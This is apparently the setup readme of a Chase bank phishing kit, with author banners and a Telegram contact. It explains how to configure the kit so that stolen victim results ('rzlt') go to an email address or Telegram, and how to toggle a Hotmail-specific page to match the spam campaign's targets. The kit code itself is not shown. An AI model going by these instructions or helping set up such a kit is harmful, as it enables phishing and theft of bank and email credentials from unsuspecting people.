/**
 * DO NOT SELL THIS SCRIPT ! 
 * DO NOT CHANGE COPYRIGHT !
 * Chase -
Thanks To beluga .
Enjoy IT
Good Hunting 😈
 
###############################################
#$            C0d3d by belugaa               $#
#$   Recording doesn't  make you a Coder     $#
#$          Copyright 2022 Chase             $#
###############################################

**/






Hello bro i'm belugaa i will show you how to setup this page :

to edit setting:
Go to admin/YOUR-CONFIG.php

// SPAM INFO

Email : to receive rzlt. 
or
Telegram : to receive rzlt.

//Config INFO

On & Off  : 

If you spam only hotmail turn on hotmail page "yes"
if you spam all emails turn off hotmail spam .





























/**
 * DO NOT SELL THIS SCRIPT ! 
 * DO NOT CHANGE COPYRIGHT !
 * Chase -
 * version 3.0
 * icq & telegram = @spoxcoder
 
###############################################
#$            C0d3d by Spox_dz               $#
#$   Recording doesn't  make you a Coder     $#
#$          Copyright 2020 Chase             $#
###############################################

**/